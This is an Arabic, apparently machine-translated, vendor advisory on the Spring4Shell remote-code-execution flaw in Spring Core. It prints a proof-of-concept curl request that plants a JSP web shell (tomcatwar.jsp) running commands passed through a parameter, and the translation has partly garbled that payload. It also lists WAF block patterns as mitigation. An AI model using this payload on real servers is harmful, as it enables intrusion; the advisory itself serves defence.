ثغرة أمنية غير مصححة في يوم الصفر في جافا سبرينغ كور: «Spring4Shell»

الفئة: ذكاء نقاط الضعف الأمنية فئة الثغرات الأمنية: تنفيذ التعليمات البرمجية عن بُعد معرف CVE: سيتم تعيين CVSS:3.0 النتيجة: سيتم تعيين Spring4Shell - ملخص تنفيذي ظهرت ثغرة أمنية حرجة جديدة في يوم الصفر في إطار Spring الشهير لـ Java في دائرة الضوء عندما تم نشر استغلالها لأول مرة بواسطة باحث أمني صيني «heige» على تويتر (@80vul). في وقت لاحق تم التأكيد على أن [...]
تم التحديث بتاريخ
April 17, 2026
تم النشر في
March 31, 2022
اقرأ الدقائق
5
اشترك في أحدث أخبار الصناعة والتهديدات والموارد.
الفئة: ذكاء نقاط الضعففئة نقاط الضعف الأمنية: تنفيذ التعليمات البرمجية عن بُعدغطاء الكهف: سيتم تعيينهالسيرة الذاتية: 3.0 النتيجة: سيتم تعيينه

سبرينج فور شيل - ملخص تنفيذي

  • ظهرت ثغرة أمنية حرجة جديدة في يوم الصفر في إطار Spring الشهير لجافا في دائرة الضوء عندما تم نشر استغلالها لأول مرة من قبل الباحث الأمني الصيني «heige» على تويتر (@80vul).
  • تم التأكيد لاحقًا على أن التجاوز الذي تم إصداره لثغرة أمنية قديمة، CVE-2010-1622، يؤثر على Spring Core على JDK9+ مما يسمح للمهاجم بتنفيذ التعليمات البرمجية عن بُعد على الأنظمة الضعيفة.
  • في وقت سابق، لوحظ سيناريو هجوم مماثل عندما تم استغلال خوادم Log4j على نطاق واسع في ديسمبر 2021، لشن هجمات رانسوم وير واسعة النطاق.

Deleted tweet by the Chinese security researcher who first published the exploit for Spring4Shell
تغريدة محذوفة من قبل الباحث الأمني الصيني الذي نشر لأول مرة الاستغلال لـ Spring4Shell

التحليل

حول إطار الربيعSpring Framework هو إطار تطبيق مفتوح المصدر يوفر دعم البنية التحتية لتطوير تطبيقات Java. Spring هو إطار Java خفيف المصدر الأكثر شيوعًا في العالم، والذي يسهل دورة تطوير تطبيقات Java للمؤسسات للمطورين.
تعد Java و Spring Boot و Auth0 و Bugsnag و Java EE بعضًا من الأدوات الشائعة التي تتكامل مع Spring. يقال إن 544 شركة تستخدم Spring في أكوامها التقنية، بما في ذلك Accenture و Zalando.الاستغلالولاستغلال الثغرة الأمنية بنجاح، يجب تمكين DataBinder. في بعض الحالات، كل ما يحتاجه المهاجم هو إرسال طلب HTTP مصمم خصيصًا لنظام ضعيف لاستغلال الثغرة الأمنية. على العكس من ذلك، يتطلب استغلال بعض التكوينات الأخرى بحثًا إضافيًا لتطوير حمولة فعالة.

حول الاستغلال الناجحيمكن للجهات الفاعلة في مجال التهديد الاستفادة من عمليات الاستغلال هذه لتشغيل الأوامر على الخادم، مما يتيح لهم الوصول الأولي إلى الجهاز.المسح الشاملسيتمكن الفاعلون في مجال التهديد من ابتكار نصوص تزحف إلى الإنترنت وتستغل الخوادم الحساسة تلقائيًا لأن الاستغلال لا يتضمن سوى HTTP POST بسيط لتطبيق ضعيف.ملاحظة: لا ترتبط ثغرة Java Spring Core Zero-Day التي يطلق عليها أيضًا اسم «Spring4Shell» بالثغرات الأخرى التي تم الكشف عنها في إطار Spring هذا الأسبوع، بما في ذلك ثغرة نظام التشغيل DoS (CVE-2022-22950) وثغرة الوصول إلى موارد تعبير Spring Cloud (CVE-2022-22963).


Infographic explaining the recent Java Spring vulnerabilities Source: Twitter
رسم بياني يشرح نقاط الضعف الأخيرة في Java Spring المصدر: تويتر

معلومات من OSINT

يتم سرد المنشورات المختلفة المتعلقة بالاستغلال الذي تم إصداره لـ Spring4Shell على النحو التالي:

  • PoC الذي تم تسريبه بواسطة»helloexp«والتي يبدو أنها تسمح للمهاجمين غير المصادق عليهم بتنفيذ التعليمات البرمجية على الأنظمة المستهدفة، تم حذفها لاحقًا.
The leaked PoC by “helloexp” which appeared to allow unauthenticated attackers to execute code on target systems, was later deleted.
PoC الذي تم تسريبه بواسطة»helloexp«والتي يبدو أنها تسمح للمهاجمين غير المصادق عليهم بتنفيذ التعليمات البرمجية على الأنظمة المستهدفة، تم حذفها لاحقًا.
The  PoC that was earlier released by the Chinese researcher, was reshared by a Twitter page vxunderground:
تمت إعادة مشاركة PoC، الذي أصدره الباحث الصيني في وقت سابق، من خلال صفحة Twitter vx تحت الأرض:
Information published on a Chinese cybersecurity site:
المعلومات المنشورة على موقع الأمن السيبراني الصيني

إثبات المفهوم (الاستغلال)

curl -v -d «class.module.classloader.resources.context.parent.pailine .first.pattern=% 25% 7Bc 2% di%20 إذا (%22j%22) يساوي (%22pwd%22))) %7b%20 java.io.تدفق المدخلات %20 في% 20% 3D% 20% 25% 7Bc 17% DI.get وقت إعادة التشغيل () .exec (طلب. احصل على المعلمة (%22 سم md%22)). احصل على تيار الإدخال () %3b%20int% 20a% 20% 3D% 20-1% 3B%20 بايت %5b %20b %20 جديد %20 بايت %5b 2048% 5D %3B%20 بينما (A%3din.read (b)) 3D-1) %7b%20 الإخراج. printLN (سلسلة %20 جديدة (ب)) %3B% 20% 7 D% 20% 7D% 20% 25% لاحقة 7B %7DI وclass.module.classloader.resources. Context. parent.pipeline. first.suffix=.jsp&class.module.classloader.resources. context.parent.pipeline.first.Directory=تطبيقات الويب/root&class.module.cl assloader.resources.context.parent.pipeline. first.pirex=Tomcatwar & CL. resources.context.parent.pipeline. first.filedat eFormat=» http://localhost:8080/springmvc5-helloworld-exmaple-0.0.1 - Snapshot/rapid7

تقوم هذه الحمولة بإسقاط غلاف ويب محمي بكلمة مرور في دليل Tomcat Root يسمى tomcatwar.jsp

- إذا كان («j» .يساوي (request.getParameter («pwd»)) {java.io.inputStream in = -.getRunTime () .exec (request.getParameter («cmd»)) .getInputStream ()؛ int a = -1؛ البايت [] b = البايت الجديد [2048]؛ بينما ((a=in.read (b)) 3D-1) {out. printll n (سلسلة جديدة (ب))؛}} -

تعمل هذه الحمولة الخاصة بخادم Tomcat على تغيير خصائص تسجيل خادم Tomcat عبر ClassLoader. تقوم الحمولة ببساطة بإعادة توجيه منطق التسجيل إلى دليل ROOT وإسقاط حمولة الملف +.

سبرينج فور شيل - التأثير: من وماذا

Figure: Popularity of Application servers worldwide . Here, Apache Tomcat using Spring Framework ranks highest. (Source:Jetbrains)
الشكل: شعبية خوادم التطبيقات في جميع أنحاء العالم. هنا، تحتل Apache Tomcat باستخدام Spring Framework المرتبة الأعلى. (المصدر:جيت برينز)

المستخدمون الذين يقومون بتشغيل الإصدار 9 من JDK والإصدارات الأحدث معرضون لهجوم RCE. أيضًا، يُقال إن جميع إصدارات Spring Core قد تأثرت.

في الوقت الحالي، لا يوجد تصحيح رسمي من الربيع. ومن ثم يمكن للجهات الفاعلة في مجال التهديد الاستفادة من هذه الثغرة الأمنية في الأداء تنفيذ التعليمات البرمجية عن بُعد غير المصرح به. نظرًا لسهولة الاستغلال، قد تقوم الجهات الفاعلة المهددة بأنشطة استغلال واسعة النطاق على غرار لوغ4j. يمكن للمهاجمين استغلال الثغرة الأمنية لتنفيذ هجمات البرامج الضارة أو برامج الفدية على المؤسسة

التخفيف

في Spring Framework، يحتوي DataBinder على وظيفة عدم السماح بأنماط معينة. كتخفيف مؤقت لهذه الثغرة الأمنية، فإن نصيحة وحدة التحكم يمكن إنشاء المكون (وهو مكون Spring مشترك عبر وحدات التحكم) ويمكن إضافة أنماط خطيرة إلى denylist.

على أجهزة حماية الشبكة مثل WAF، قم بتطبيق تصفية القواعد لسلاسل مثل «class.*» و «Class.*» و «*.class.*» و «*.Class.*» وفقًا لحالة حركة المرور الفعلية للخدمات المنشورة. هذا لأن «Spring4Shell» يستفيد من الحقن في الفئة (شديد جدًا)

أخيرًا، يجب على المرء أن يظل على اطلاع دائم بأحدث إصدار من التصحيحات الرسمية من Spring وإصلاح الثغرات الأمنية وفقًا لهذه التصحيحات.

المراجع

احصل على معلومات التهديدات العالمية في الوقت الفعلي

قم بحماية عملك من التهديدات الإلكترونية باستخدام بيانات معلومات التهديدات العالمية في الوقت الفعلي.. تجربة مجانية لمدة 30 يومًا وبدون التزام.
جدولة عرض تجريبي
بيانات معلومات التهديدات في الوقت الحقيقي
مزيد من المعلومات والسياق حول الدردشة تحت الأرض
خدمات البحث حسب الطلب
نموذج لوحة القيادة
موجز معلومات التهديدات العالمية

قم بالحماية والمضي قدمًا الذكاء القابل للتنفيذ

إن Global Cyber Threat Intelligence Feed عبارة عن منصة مبتكرة تجمع المعلومات من مصادر مختلفة لمساعدة الشركات والمؤسسات على البقاء في صدارة الهجمات الإلكترونية المحتملة. توفر هذه الخلاصة تحديثات في الوقت الفعلي للتهديدات الإلكترونية، بما في ذلك البرامج الضارة وعمليات الاحتيال الاحتيالي وغيرها من أشكال الجرائم الإلكترونية.
موثوق بها من قبل أكثر من 400 مؤسسة رائدة